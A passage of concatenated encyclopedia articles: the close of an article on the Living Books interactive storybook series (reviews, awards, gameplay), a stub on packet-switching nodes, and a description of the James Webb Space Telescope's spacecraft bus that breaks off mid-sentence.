English words just by intensely playing Living Books, despite not coming from English-speaking backgrounds and being illiterate in English. Another study found that the engaging and motivating design of Living Books' creative construction approach achieved effective incidental, unexpected, and by-product learning. The Philadelphia Inquirer reported that children with autism who had never spoken a word imitated the phrase "I'm sorry" from the series after playing, noting that the series assisted children with neurological problems to process and retrieve information. Other critics questioned the series' efficacy as a learning tool. The Age notes that the idea of presenting a book with interactivity, sound, and music was a "whole new idea" that "left many unsure as to its soundness"; reactions from teachers were mixed, with some believing it added "another dimension to literature", while others felt it would have been "cheaper and more worthwhile" to buying the class physical copies of each book. While Simson L. Garfinkel and Beth Rosenberg of Boston Globe Online found Living Books to be of high quality in a market flooded with "questionable" releases for children, they stated that not all of the titles lived up to the company's educational claims, noting Dr. Seuss' ABC, and Arthur's Reading Race as exceptions. In a 1995 study Preparation of Teachers for Computer and Multimedia-Based Instruction in Literacy, "students were consistently impressed with the entertainment value of such software, but extremely dubious about their classroom usefulness". A study presented to American Educational Research Association in 1996 showed that "jazzy 'interactive storybooks' like Harry and the Haunted House...promote less reading comprehension in kids than moderately interactive, more fact-oriented CD-ROMs like Discis Books’ Thomas’ Snowsuit". SuperKids suggested that while the programs wouldn't teach kids to read, it may "enhance a pre-reading child's interest in, and appreciation for books". The Independent described it as "quasi-educational material" due to being "designed to inject fun into learning". The New York Times wrote that the educational content seemed like an afterthought, adding that they were "horrified" that Arthur's Computer Adventure activity 'Deep Dark Sea', instead of teaching children world geography or ocean life, was "pure entertainment" game. The Washington Post wondered if children would learn to read or just play with the illustrations. The Goldstein, Olivares and Valmont (1996) study found that children had trouble recalling the narrative as they "approached the reading as a game, rather than a text". Complex questioned whether the series "took away a bit of the imagination inherent to reading, though noted they were "undeniably fun". The Age wrote, I'm sure they entertain more than educate, but either way they create a new dimension to children's literature". Hotspots and interactivity The series has been praised for its use of hotspots and interactivity. The Age noted that upon the series' original release, "some people saw it simply as a form of interactive cartoon, while others have described the Living Books series as little more than a talking book". Compute thought that in "typical Broderbund fashion", Living Books "goes way beyond a simple storytelling program". CD-ROMs Rated by Les Kranz praised the number of clickable areas in Little Monster at School. The Independent liked the "hidden cartoons in every page". Compute! wrote Living Books is "overflowing with one enchanting discovery after another". Folha appreciated that the series encouraged players to discover by moving around the screen, giving movement and speech to objects. The New York Times praised Just Grandma and Me for its interactive "distractions" alongside the story text and illustrations. Technology & Learning opined, "the developers seem to have delighted in creating imaginative events". The Seattle Times said Just Grandma and Me was "full of discovery". SuperKids felt The Tortoise and the Hare had a "captivating variety of exploration opportunities for young minds". Wired thought the peripheral elements were "cleverly" designed to be "playful", "imaginative", and "sometimes humorous". Children's Tech Review wrote that the series combined full color animation with a "crisp, responsive design" that "stood out from the rest". Tampa Bay Times reported their child testers willingly forwent Beavis, Butt-Head and WWF Wrestling to play the program, arguing the series' secret ingredient was "creativity". Entertainment Weekly praised Arthur's Birthday for its "inventive ending" and "hilarious hidden secrets". PC Mag called the series "charming", "delightful", "engaging", and "entertaining". Parent's Choice wrote "the thought and creativity that was put into the interactivity in Berenstain Bears Get in a Fight is largely unmatched in any other interactive book." The Seattle Times wrote that the game's simplicity is a draw, as they lack "whizzy technology or tortured attempts to be interactive". The Educational Technology Handbook liked that the series "permit[s] user control over pace, sequencing, and help". Family PC noted their success was due to "let[ting] kids explore and find a cause-and-effect relationship between clicking the mouse and having something happen on the screen." All Game deemed Berenstain Bears in the Dark a "useful addition to any child's library of computer games". Game Developer Magazine felt the series "flunks out", in versatility as players are unable to "abort an animation" despite some of them being quite long. Jim Shatz-Akin at MacUser suggested, "they're not as interactive as they could be...The Berenstain Bears Get in a Fight has long animations during which all a kid can do is sit and watch". Graphics and animation; music and sound The series has been praised for its graphics and animation. CD-ROMs Rated by Les Kranz praised the graphics of Little Monster at School Compute! deemed Living Books a "new style of storytelling that is just a hop away from a fully interactive cartoon"; the magazine praised the animation sequences as "topnotch" and "approach[ing] cartoon quality, as well as the character-adding facial expressions". Tampa Bay Times noted the animations have the quality of Saturday morning cartoons. Meanwhile, The New York Times Guide to the Best Children's Videos thought the characters in Arthur's Computer Adventure were "stiff" compared to those in the TV show. Sally Fennema-Jansen's paper, Essential tools of the trade notes programs like Living Books and the Early Learning House offer a variety of visual effects which are essential in engaging students at the computer. CD-ROMs Rated wrote that children would be disappointed by other interactive storybooks like Mud Puddle and The Paper Bag Princess due to them lacking Living Book's animated illustrations. PC Mag felt the games were "PC's answer to the tradition of big screen animated films". New Straight Times thought he graphics were "colourful and sharp" despite being on a 256 color display. The Baltimore Sun thought the series had "delightful animation" with "zany surprises". The Washington Post described the programs as the "electronic equivalent of pop-up books"; it felt the "animations are whimsical enough to amuse parents". Children's Tech Review wrote that they featured "state-of-the art graphics and sound". Tampa Bay Times described Living Books as "[like] a cartoon episode of Masterpiece Theatre". Computer Shopper's Carol S. Holzberg said Sheila Rae was a "wonderfully upbeat and toe-tapping reading adventure". The series has been praised for its music and sound. The New York Times praised Just Grandma and Me for offering a "captivating" soundtrack. Sally Fennema-Jansen's paper, Essential tools of the trade notes programs like Living Books and the Early Learning House offer a variety of auditory effects which are essential in engaging students at the computer. An information sheet published by British Educational Communications and Technology Agency said the series "work[ed] well with children who are unresponsive and who avoid conversation, as they become involved with the combination of sound effects, spoken text and visual display". The paper 'Multimedia materials for language and literacy learning' suggested that the "animation and special effects may improve the quality of the story model by providing multi-sensory cues to children with language and literacy disorders who might otherwise ignore important contextual information". SuperKids felt The Tortoise and the Hare had a "clear presentation". SuperKids thought Stellalluna was a "beautifully done version". Compute! thought New Kid on the Block "adds a new dimension" to Living Books. Adaption of books The series has been praised for its adaption of books. Tampa Bay Times felt that The Tortoise and the Hare "demonstrates that even a timeworn tale can be revived for youthful audiences with multimedia dazzle". Courant felt that the success of its games was aided by the "opportunities for animation and fun" within their source material. Publishers Weekly, in a review of Dr. Seuss' ABC, stated that, "the producers' fondness for Dr. Seuss and their fidelity to his sense of refined silliness spill into every sequence." On the other hand, reviewing two Dr. Seuss titles The Washington Post criticised Living Books for "re-purposing content" and "exploiting existing media franchises", adding that "nearly all of the additions mangle or simply ignore the Seuss sensibility". PC Mag felt Living Books' Arthur's Birthday "captured all the charm of the original". The Photographic Image in Digital Culture thought Living Books was a "successful reworking of children's literature". Business Standard felt Green Eggs and Ham was "faithful to the original" while MacWorld felt it offered a "charming, lighthearted adaptation". The Educational Technology Handbook praised the series' use of quality literature. MetzoMagic thought Green Eggs and Ham would be "irresistible for Dr Seuss devotees". SuperKids felt Green Eggs and Ham was a "very good program, based on an excellent story". Allgame felt Arthur's Reading Race was "sure to delight children who enjoy the adventures of Arthur in books or on TV". Macworld suggested that Arthur's Reading Race's success was "a testament to Arthur's entertainment value". Complex felt the games allowed kids to "live out their personal Pagemaster fantasies" Superkids thought Tortoise and the Hare "does the old story justice". Baltimore Sun liked that Living Books chose to adapt a "well-written story with a morale". The Seattle Times noted the series' short playtime, though noted it replay value due to children liking to revisit favourite books. SuperKids also noted the series' replayability, as their kid reviewers engaged with the story even if they had read it before. Conversely, The Daily Gazette warned that Arthur's Computer Adventure wouldn't hold kids' attention for long. Mac Observer described the series as "cognitive dissonance free" as opposed to other interactive storybooks where the "action either contradicts the story or adds nothing to the narrative being employed". On the other hand, Len Unsworth's paper "Reframing research and literacy pedagogy relating to CD narratives" noted the dissonance between text and action; in Stellaluna "They perched in silence for a long time" is followed with incongruous activity and noise instead of a reflective pause; Unsworth's writes that the actions are "gratuitous intrusions into the story and which do not appear in the book version in any form". Simson L. Garfinkel and Beth Rosenberg felt that the added dialogue supplementing the book's text was sometimes "out of character". Of The Tortoise and the Hare, Creighton University said, "By comparison with the exciting interactive program, the book is only okay". Many critics wrote about the series as a reading tool compared to the physical book. The New York Times questioned the addition of the "original "dead" book" with the CD-ROM adaption, suggesting "most children never get around to opening the real book". Hartford Courant opined "[it] just isn't as good as sitting on the sofa with your child on your lap and a stack of books next to you". Salon suggested the series had a portability problem when compared to traditional books, and that they didn't work as "sleeper-friendly software". Donald R Roberts, chairman of Stanford University Department of Communication felt there were important "social dimensions" involved in the parent-child reading process that couldn't be replicated through a digital book, including contact and a sense of security. World Village felt Living Books "handsomely realized the story" of The Berenstain Bears: In the Dark. German site Rhein-zeitung.de felt the "combination of CD and book has the best conditions to become a bestseller". PC Mag noted that the series offers a narrator that can read the same page over again "without complaint". Humour, writing, and ease of use Many critics praised the series' humour and wit. The Independent thought the best titles were "amusing" with funny storylines. Compute! deemed Ruff's Bone "the funniest Living Book so far". The Children's Trust lamented that Living Books wasn't aimed at an older audience, but wrote that the storybooks were sufficient for their patients due to being "amusing". PC Mag thought Living Books pack enough humor and tickle adults as they entertain children". Compute! conceded that even adults would be "affected by its delightful story and sharp sense of wit." Len Unsworth's paper "Reframing research and literacy pedagogy relating to CD narratives" writes that Stellaluna was a "very significantly change" from the "somewhat serious tone" of the book due to an "almost a slapstick approach to frivolous humour". Baltimore Sun felt the activities were the "right blend of humor and purpose". MacWorld deemed Arthur's Reading Games an "amusing, interactive product". Courant felt that while the developer had "the formula figured out". Upon previewing the second title in the series, Computer Gaming World wrote that Just Grandma and Me was "not just a creative fluke", and felt Living Books "may have the wit and imagination to keep the magic in the series indefinitely". Tes.com thought of Just Grandma and Me, "There's so much charm that parents, and teachers, will enjoy it too." World Village thought Arthur's Reading Race was "very well written". The Baltimore Sun felt the games "vary dramatically in quality" while The Independent agreed that the books' quality fluctuates. Superkids felt Arthur's Computer Adventure was "not the strongest entry in the Living Books product line". SuperKids wrote that Arthur's Computer Adventure wasn't the strongest entry in the Living Books product line. Many reviewers praised the series for its ease of use. Compute! noted "it's a cinch for even very young children to run the program without adult assistance". The Spokesman Review described the series as "Broderbund's software version of training wheels." Simson L. Garfinkel and Beth Rosenberg found that the CD-ROMs played better on Macs than on PCs. New Straight Times felt their "simple and interactive interface" gave Living Books and "edge" over its competitors. Engadget deemed it "the young-kid equivalent of Cyan's revolutionary Myst immersive world". Tampa Bay Times felt the titles were "crash-proof" with "rock-solid reliability and kid-friendly ease of use", adding that it succeeds in "encouraging children to become comfortable using a computer". All Game noted that no documentation is provided but that "everything is self-explanatory and intuitive within the program". The Age suggested that the games would only become popular in Australian schools once they had regular access to CD-ROM units. Race and gender, and in translation MacUser felt that Living Books and Edmark's Early Learning House overcame the issue of exclusively Caucasian characters in younger children's programs through the use of animal and friendly monster protagonists. The New York Times Guide to the Best Children's Videos felt the use of a female role model in Sheila Rae, The Brave was "excellent". Allgame thought Sheila Rae was an "excellent program for young girls and boys". One study of The Tortoise and the Hare found that some of its incidental hot spots included stereotypical depictions of male and female behaviours. MacAddict criticised the Little Ark Interactive title Daniel in the Lions’ Den for teaching stereotypes; the titular protagonist Daniel is thrown into the lions’ den by three "not-so-wise" men who are characterised as fat, hunchbacked, and with darker skin respectively, together acting like the Three Stooges. In 1994, Aktueller Software Markt praised two entries in the series and concluded the review by begging for a German translation of the programs. After a local version was launched in 1998–9, German site Feibel noted that "the translation was done by people who have no idea about the German language", adding that "particularly disturbing is the voice of the grandmother, who has an American accent"; the site argued that "the accent alienates the text" and "significantly reduced the quality of the story". Of the international dubs, reviewer Roger Frost commented "It's interesting that several teams of experts worked on these, just to 'dub' them so that lip movements matched the new dialogue". The Age wrote that, the "ongoing popularity of adventure games" including the Carmen Sandiego series, Flowers of Crystal and Dragonworld, showed promise that Living Books would "become very popular in Australian classrooms" Re-releases and Little Ark Interactive The Seattle Times though felt the additions in the Version 2.0 re-releases wouldn't be enough to convince customers to re-purchase the program. Of the Wanderful re-releases, Engadget questioning whether the storybooks would hold up in the current market though noted the "effort and care that went into their original versions". Children's Technology Review wrote of Wanderful's Ruff's Bone app, "[it's] a good book meets solid interactive design, in this updated iPad edition of the classic Living Book". CNBC deemed the dynamic language function in the Wanderful re-releases a "stunningly simple and powerful feature unlike anything found in other interactive storybooks or eBooks". Mac Observer felt the Wanderful upgrade had "well researched curriculua and activities aligned with the Common Core State Standards Initiative". Children's Tech Review noted that on the iPad screen, the graphics look "bitmapped" and "fuzzy" as if they have been "directly ported", though noted this gives the programs a "retro" look; they praised the hotspots as "still-funny-after-all-these-years" and the sound as having not "faded a bit". The site praised the modern multi-touch environment that "enhance[s] a child's feeling of control". They noted that while Living Books still had its "magic", "unlike the '90s, [children] have many more choices". MacUser felt that Little Ark Interactive pair of titles would be a "huge assist" to any parent struggling to answer the question 'What is the Bible' from a religious or a cultural perspective; it felt the titles could open the possibility for parent-child discussions on alternative races and religions. The magazine praised the way the programs told the simple story through fun, bright colours, entertaining music adding, "it's rare to find such enjoyable music in a kid's game". MacAddict chose not to have public school children review the programs so as to maintain separation of church and state. It felt the titles were "charming", but lacked "real Bible education"; commenting that their review by a multidenominational, ecumenical panel during developed led to The Story of Creation being "watered down" to "just a bunch of singing and dancing [and] cute animations". Arizona Republic wrote that The Story of Creation presented the creation of the world in a "very basic way", and that that players shouldn't "expect to be dazzled". Larry Blasko of the Associated Press noted that The Story of Creation is one of the most well-known Bible stories, and that it was impressive for Little Ark Interactive to be able to present it to children through "creative" software in a "clever and amusing way"; he like the use of a child's voice was a "nice touch". Blasko added The Story of Creation "shows no discernible denominational tilt", and the fact that God is never pictures means it "should pass muster for all flavors of doctrine". Logansport Pharos-Tribune praised Living Books' "associated group of titles". Of the Wanderful re-releases of Little Ark, Children's Technology Review wrote "[these] bible stories that come to life, in the context of a solid 'Living Book' shell" due to their "effective language immersion experience", and suggested their use of slapstick humor "could actually make religion fun." Sunday Software noted that The Story of Creation was the only CD-ROM "in existence" for young children about creation, and commented the "cute" program had "good graphics". Recommendations and scores Many reviewers directly recommended their audience to purchase Living Books. Technology & Learning wrote in the Weakness section of their review, "it is hard to find fault with a program that is as well thought out and entertaining as Just Grandma and Me". The Seattle Times wrote that Just Grandma and Me is "the best program I've seen for this age group". Publishers Weekly, in a review of Dr. Seuss' ABC, called that title "one of the best children's CD-ROMs to date. Compute thought Living Books was a "rare piece of software that doesn't suffer at least a minor flaw or two". World Village deemed Arthur's Reading Race a "must-have program". PC Mag felt Ruff's Bone was the "best Living Books yet". Mac User opined "you can't go wrong" with Living Books or Humungous games. AllGame thought Stellaluna was "very entertaining and is sure to be a hit with children". PC Mag wrote that Broderbund had "scored a major hit" with Living Books. SuperKids' review of Green Eggs and Ham wrote that they "highly recommend the program for any child capable of grasping the story". Just Adventure "heartily recommended" Arthur's Computer Adventure for any "parents who wants to enjoy computer time with their children". Of The Tortoise and the Hare, All Game thought children of all ages would "enjoy this story a great deal". Reviewer Roger Frost felt Living Books, along with Sesame Street titles, had "enough plus points to make them powerfully magnetic". Daily Egyptian thought the titles were "standouts" while Deseret News called them "excellent". Parent's Choice said Arthur's Birthday was "one of the best ways you can spend 5 bucks for your child." The series has received consistently high review scores. Arthur's Teacher Trouble, The Tortoise and the Hare, Ruff's Bone, and Little Monster at School all received a very high score of over 90.00 in CD-ROMs Rated. MacUser's December 1994 issue contained reviews on all 8 titles released at that point and scored each a 4 or 4.5 out of 5.All Game gave Arthur's reading race 4.5 stars out of 5. Just Adventure gave Arthur's Computer Adventure a top rating of A while All Game gave it 4/5 stars. Awards |- ! scope="row" | 1992–1997 | Just Grandma and Me | Winner of over 16 awards since its release in 1992. | |- ! scope="row" |1993–1997 | Arthur's Teacher Trouble | Winner of 15 awards since its release in 1993–1997 | |- ! scope="row" | 1993 | Living Books | PC Magazine Award of Technical Excellence | |- ! scope="row" | 1993 | Living Books | Popular Science Magazine Award of Technical Excellence | |- ! scope="row" | 1993 | Living Books | PC Entertainment Magazine Special Achievement in Design Excellence | |- ! scope="row" |1994 | New Kid on the Block | National Educational Film and Video Silver Apple Award | |- ! scope="row" | 1994 | The Tortoise and the Hare | Macworld Award for Best Entertainment CD in the Children/Young Adult's Category | |- ! scope="row" | 1994 | The Tortoise and the Hare | NewMedia Magazine's Invision Multimedia Award for Gold in the Games, Edutainment Category | |- ! scope="row" |1994 | The Tortoise and the Hare | Macworld rated as "One of the Year's Top 10 CD-ROMS" | |- ! scope="row" |1994 | Ruff's Bone | WAcademy of Interactive Arts & Sciences' Cybermania Award for Outstanding Special Achievement | |- ! scope="row" | 1994 | Ruff's Bone | Academy of Interactive Arts & Sciences Cybermania Award for Educational Award: Interactive Books | |- ! scope="row" | 1994 | Living Books | Macworld World-Class Award | |- ! scope="row" | 1994–1995 | Living Books | Software Publishers Association Technology and Learning Next in Series Award | |- ! scope="row" |1995 | Arthur's Birthday | National Educational Media Network's Gold Apple Award. | |- ! scope="row" | 1995 | Harry and the Haunted House | NewMedia Magazine's Bronze Invision Award for Technical/Creative Excellence, Best Audio/Soundtrack | |- ! scope="row" | 1995 | Harry and the Haunted House | National Educational Media Network's Bronze Apple Award | |- ! scope="row" | 1995 | Living Books | Macworld rated as "One of the Year's Top 10 CD-ROMs" | |- ! scope="row" | 1995 | Living Books | Dr. Toy 100 Best Children's Products | |- ! scope="row" | 1995 | Living Books | The Computer Museum Guide to the Best Software Best Software for Kids | |- ! scope="row" | 1995 | Living Books | Multimedia World Readers' Choice Award | |- ! scope="row" | 1996 | Sheila Rae the Brave | MacWorld listed as a runner-up to "One of the Year's Top 10 CD-ROMS". | |- ! scope="row" | 1997–98 | Arthur's Reading Race | Technology & Learning's Home Learning Software Award | |- ! scope="row" | 1998 | Arthur's Computer Adventure | Newsweek | Recommendation |- ! scope="row" | 2005 | Living Books | Technology & Learning's Awards of Excellence – Readers' Choice Award | |- ! scope="row" | 2006 | Dr. Seuss's ABC | Technology & Learning's Award of Excellence | |- ! scope="row" | 2007 | Sheila Rae, the Brave | Technology & Learning's Award of Excellence | |- ! scope="row" | 2008 | Living Books | Home PC Editor's Choice 100 Top Products | |- ! scope="row" | 2009 | Living Books | National Parenting Center Seal of Approval | |- ! scope="row" | 2010 | Harry and the Haunted House | Children's Technology Review Editor's Choice Award | |- ! scope="row" | 2011 | Arthur's Teacher Trouble | Children's Technology Review Editor's Choice Award | |- ! scope="row" | 2012 | Wanderful's Ruff's Bone | Children's Technology Review Editor's Choice Award | |- ! scope="row" | 2013 | Arthur's Birthday | Parents Choice Awards Parents' Choice Gold Honor Award | |- ! scope="row" | 2013 | Wanderful's Berenstain Bears Get in a Fight | Parents Choice Awards Parents' Choice Gold Honor Award | |- ! scope="row" | 2013 | Wanderful's Berenstain Bears In The Dark | Parents Choice Awards Parents' Choice Gold Honor Award | |- ! scope="row" | 2013 | Wanderful's The Tortoise and the Hare | Parents Choice Awards Parents' Choice Gold Honor Award | |- ! scope="row" | 2013 | Arthur's Teacher Trouble | Parents' Choice Silver Honor Award | |- ! scope="row" | 2013 | Harry and the Haunted House | Parents' Choice Silver Honor Award | |- ! scope="row" | 2013 | Ruff's Bone | Parent's Choice Recommended | |- ! scope="row" | 2013 | Wanderful Storybooks Sampler | Parents' Choice Approved | |- ! scope="row" | 2014 | The Berenstain Bears In The Dark | The Children's eBook Award for Best Bedtime App – Gold | |- ! scope="row" | 2014 | The Berenstain Bears In The Dark | The Children's eBook Award for Best Special Needs Autism App – Gold | |- ! scope="row" | 2014 | The New Kid on the Block | The Children's eBook Award for Best Special Education App – Silver | |- ! scope="row" | 2014 | Little Monster At School | The Children's eBook Award for Best Special Education App – Bronze | |- ! scope="row" | 2014 | Harry and the Haunted House | The Children's eBook Award for Best Adventure App – Silver | |- ! scope="row" | 2014 | Arthur's Birthday | The Children's eBook Award for Best Birthday App – Bronze | |- ! scope="row" | 2014 | Arthur's Teacher Trouble | The Children's eBook Award for Best Early Reader App – Gold | |- ! scope="row" | 2014 | The Tortoise and the Hare | The Children's eBook Award for Best Early Reader App – Bronze | |- ! scope="row" | 2014 | Little Ark Interactive's The Story of Creation. | The Children's eBook Award for Best Early Learner app – Silver | |- ! scope="row" | 2015 | Wanderful | Mom's Choice Gold Award | |- Little Ark Interactive awards |- ! scope="row" |2014 | The Story of Creation | Children's Technology Review's Editor's Choice Award | |- ! scope="row" |2014 | Daniel in the Lion's Den | Children's Technology Review's Editor's Choice Award | |- Plot and gameplay Living Books are interactive storybooks – effectively a blend of computer games and hypertext fiction They are "electronic versions of either narrative or expository texts that combine high quality animations and graphics with speech, sound, music, and special effect". Primarily using classic children's literature source material, the series adapted these stories CD and dressed them up with music, animation and real-voice narrations. The games did not live off of profound aesthetics, but from the sheer joy of discovery and the effect. The plots are faithful to their respective books. The games are generally adaptions of books from popular children's franchises such as Arthur, Berenstain Bears, and Dr. Seuss, however three titles exclusively created by Living Books (not being existing book adaptions) included Ruff's Bone (co-produced by Colossal Pictures), Harry and the Haunted House, and a retelling of The Tortoise and the Hare. Interactive storybooks are a storytelling device that encourages kids to take part. Users are able to virtually turn the pages, click on various areas to get sound effects and short animation sequences, or they can click on words and sentences to hear them read aloud. The games allow players read the book in US English, UK English, and other languages, or to have it read to them in each language by a narrator. Players are offered two ways of reading the story: Read To Me (only allowing players to flip pages) and Let Me Play (including player interaction). The former imitated a traditional storybook, with linear progression from beginning to end, while the latter offered a more compartmentalized experience, where children can pause to investigate the various worlds. The story text is written at the top of the page and highlighted as each word is read by the narrator, however some additional character dialogue is not printed. After a child finishes reading a page, they can explore it by clicking on objects to see what they do. They can hear selected words or phrases by clicking on them. The screen "becomes a playground". Players experience animations and voice acting, while clicking on hidden hotspots reveal surprise animations, sound effects, songs, and sight gags. One page can have up to 44 active buttons and 5 navigational buttons. Each scene is self-contained and players can navigate page-by-page using the forward and backward cursor keys. The screen fades to black during the transition between scenes. The programs came with built-in customizing features to include, exclude, sequence, and vary the length of the games; or to adjust the speech. Many of the titles are accompanied by teacher guides with photocopiable resources. Little Ark Interactive follow a similar formula, either the player can choose 'Read-to-me' and have the narrator tell the story which is supplemented by animations; or they can choose 'Let Me Play' and explore page by page, clicking on hotspots to reveal sight gags and music cues. Titles in the series Little Ark Interactive titles References External links Archived Main page Museum of Play archive 1992 video games 1993 video games 1994 video games 1995 video games 1996 video games 1997 video games 1998 video games Broderbund games Houghton Mifflin Harcourt franchises Random House Mattel ScummVM-supported games Children's educational video games Software for children Video game franchises introduced in 1992 Video games based on novels Video games developed in the United States
41481
https://en.wikipedia.org/wiki/Packet-switching%20node
Packet-switching node
A packet-switching node is a node in a packet-switching network that contains data switches and equipment for controlling, formatting, transmitting, routing, and receiving data packets. Note: In the Defense Data Network (DDN), a packet-switching node is usually configured to support up to thirty-two X.25 56 kbit/s host connections, as many as six 56 kbit/s interswitch trunk (IST) lines to other packet-switching nodes, and at least one Terminal Access Controller (TAC). Packets (information technology)
52566668
https://en.wikipedia.org/wiki/Spacecraft%20bus%20%28James%20Webb%20Space%20Telescope%29
Spacecraft bus (James Webb Space Telescope)
The spacecraft bus is the primary support element of the James Webb Space Telescope, launched on . It hosts a multitude of computing, communication, propulsion, and structural components. The other three elements of the JWST are the Optical Telescope Element (OTE), the Integrated Science Instrument Module (ISIM) and the sunshield. Region 3 of ISIM is also inside the spacecraft bus. Region 3 includes the ISIM Command and Data Handling subsystem and the Mid-Infrared Instrument (MIRI) cryocooler. The spacecraft bus must structurally support the 6.5 ton space telescope, while weighing only . It is made primarily of graphite composite material. It was assembled in the U.S. state of California by 2015, and then it had to be integrated with the rest of the space telescope leading up to its planned 2018 launch. The bus can provide pointing precision of one arcsecond and isolates vibration down to two milliarcseconds. The fine pointing is done by the JWST fine guidance mirror, obviating the need to physically move the whole mirror or bus. The spacecraft bus is on the Sun-facing "warm" side and operates at a temperature of about 300 kelvins (80°F, 27°C). Everything on the Sun-facing side must be able to handle the thermal conditions of JWST's halo orbit, which has one side of continuous sunlight and the other shaded by the spacecraft sunshield. Another important aspect of the spacecraft bus is the central computing, memory storage, and communications equipment. The processor and software direct data to and from the instruments, to the solid-state memory core, and to the radio system which can send data back to Earth and receive commands. The computer also controls the pointing and moment of the spacecraft, taking in sensor data from the gyroscopes and star tracker, and sending the necessary commands to the reaction wheels or thrusters. Overview The bus is a carbon fibre box that houses a large number of major systems that keep the telescope functioning, such as the solar panels and computers. It also contains the MIRI cooler and some ISIM electronics. There are six major subsystems in the spacecraft bus: Electrical Power Subsystem Attitude Control Subsystem Communication Subsystem Command and Data Handling Subsystem (C&DH) Command Telemetry Processor Solid State Recorder (SSR) Propulsion Subsystem Thermal Control Subsystem The spacecraft bus has two star trackers, six reaction wheels, and the propulsion systems (fuel tank and thrusters). Two major tasks are pointing the telescope and performing station keeping for its metastable L2 halo orbit. Command and Data Handling (C&DH) The Command and Data Handling system includes a computer, the Command Telemetry Processor (CTP), and a data storage unit, the Solid State Recorder (SSR), with a capacity of 58.9 GB. Communications The communications dish which can point at Earth is attached to the bus. There is Ka-band and S-band radio communication. The Common Command and Telemetry System is based on Raytheon ECLIPSE system. The system is designed to communicate with NASA's Deep Space Communication Network. The main Science and Operations Center is the Space Telescope Science Institute in the U.S. state of Maryland. Rocket engines, attitude control The JWST uses two types of thrusters. The Secondary Combustion Augmented Thrusters (SCAT) use hydrazine () and the oxidizer dinitrogen tetroxide () as propellants. There are four SCATs in two pairs. One pair is used to propel the JWST into orbit, and the other performs station keeping in orbit. There are also eight Monopropellant Rocket Engines (MRE-1), so called because they use only hydrazine as fuel. They are used for attitude control and momentum unloading of the reaction wheels. JWST has six reaction wheels for attitude control, spinning wheels that allow the orientation to be changed without using propellant to change momentum. Finally, there are two titanium helium tanks to provide unregulated pressurant for all propellants. To detect changes in direction JWST uses hemispherical resonator gyroscopes (HRG). HRGs are expected to be more reliable than the gas-bearing gyroscopes that were a reliability issue on Hubble Space Telescope. They cannot point as finely, however, which is overcome by the JWST fine guidance mirror. Thermal Thermal systems on the bus include the Deployable Radiator Shade Assemblies. There are two, one vertical (DRSA-V) and one horizontal (DRSA-H), for vertical and horizontal respectively (with respect to the coordinate system of the spacecraft bus). The membrane that makes up the DRSA is a coated Kapton membrane. Other thermal elements on the outside include a small radiator for the battery. There is also a narrow lower-fixed radiator shade, also made of coated Kapton membrane. The coating of the membrane is silicon and VPA. Other areas of the outside are covered with JWST multi-layer insulation (MLI). Electrical Power Subsystem (EPS) The Electrical Power Subsystem provides electricity to the JWST spacecraft. It consists of a set of solar panels and rechargeable batteries, a solar array regulator (SAR), a power control unit (PCU), and a telemetry acquisition unit (TAU). The solar panels convert sunlight directly into electricity. This raw power is fed to the SAR which consists of four redundant buck converters each operating with a maximum-power point tracking (MPPT) algorithm. While the output voltage is not tightly regulated, the buck converters will not allow the spacecraft main bus voltage to drop below about 22 volts, or rise above about 35 volts. With every science instrument and all support circuits "on" simultaneously, approximately three of the four redundant converters could handle all of the power required. Typically one or two converters need be operating at a time with the other two on active standby. The Power Control Unit (PCU) consists mainly of electronic switches that turn each science instrument or support device on or off under control of the central computer. Each switch allows power to flow to its selected instrument from the SAR. Communications with the central computer is via a 1553 bus. In addition to the power switches, processors for the SAR MPPT algorithm are located in the PCU, along with some telemetry processors, processors to detect when the spacecraft has disconnected from the launch upper stage, and some cryo-cooler controllers. The Telemetry Acquisition Unit (TAU) consists of electronic switches for various heaters for the "warm" sides of the telescope. In addition, there are switches for the deployment actuators, and the bulk of the telemetry processors (e.g. measuring temperatures, electric power, fuel levels, etc.). The TAU communicates with the central computer via 1553 bus. Both the PCU and TAU contain completely redundant systems with one active while the other is in standby mode or off, completely. The rechargeable batteries of JWST are the lithium-ion type. The batteries use the Sony 18650 hard carbon cell technology. The batteries are designed to endure spaceflight, and should sustain 18,000 charge-discharge cycles. Each solar panel structure support is honey-comb carbon fiber composite. Some early configurations of the bus had two solar panel wings, one on each side. Part of the JWST program design was to allow different design variations to "compete" with each other. Structure Although the bus will operate in the weightless environment of outer space, during launch it must survive the equivalent of 45 tons. The structure can support 64 times its own weight. The spacecraft bus is connected to the Optical Telescope Element and sunshield via the Deployable Tower Assembly. The interface to the launch vehicle in on outside; taking the form of a cone, it along with the payload adapter transmits the weight and acceleration forces outward launch vehicle walls. The structure of the bus walls are made of carbon fiber composite and graphite composite. The bus is long without the solar arrays. From one edge of an extended radiator shade to another it is ; this includes the length of the two two-meter-wide radiator shades. The tail-dragger solar array is but it is normally at an angle of 20° towards the sunshield. The array is in front of the sunshield segments shield deployment boom, which at the end of it also has a trim tab attached. The bus structure itself weighs . Once JWST is launched, it begins to unfolded and extend to its operating configuration. The plan is that during its first week the deployable tower will extend, which will separate the bus from the upper spacecraft by about 2 meters. Testing A software simulation of the Solid-State Recorder was developed for testing purposes, which supports the overall software simulation of JWST. This is called the JWST Integrated Simulation and Test (JIST) Solid State Recorder (SSR) Simulator, and was used to test flight software with SpaceWire and MIL-STD-1553 communication, as it relates to the SSR. An Excalibur 1002 Single Board Computer ran the test software. The SSR test software an extension of the JIST software which is called JWST Integrated Simulation and Test core (JIST). JIST brings together software simulations of JWST hardware with actual JWST software, to allow virtual testing. The simulated SSR was created to support making a software test version of the JWST, to help validate and test the flight software for the telescope. In other words, rather than using an actual test hardware version of the SSR, there is a software program that simulates how the SSR works, which runs on another piece of hardware. The SSR is part of the Command and Data Handling Subsystem. Construction The spacecraft element is made by Northrop Grumman Aerospace Systems. The sunshield and Bus are planned to be integrated in 2017. In 2014, Northrop Grumman began construction of several spacecraft bus components including the gyroscopes, fuel tanks, and solar panels. On May 25, 2016, the spacecraft's panel integration was completed. The overall spacecraft bus structure was completed by October 2015. The spacecraft bus was assembled at facilities in Redondo Beach, California in the United States. The completed spacecraft bus was powered on for first time in early 2016. The solar arrays completed a preliminary design audit in 2012, moving to the detailed design phase. Fuel and oxidizer tanks were shipped out to assembly in September 2015. In 2015, the communications subsystems, star trackers, reaction wheels, fine sun sensors, deployment electronics Unit, command telemetry processors, and wire harnesses were delivered for construction. The spacecraft bus will be assembled with the Spacecraft Element and the other parts in California. For launch, the spacecraft bus is attached to the Ariane 5 on a Cone 3936 plus ACU 2624 lower cylinder and clamp-band. It is a contained launch fairing, 4.57 meters (15 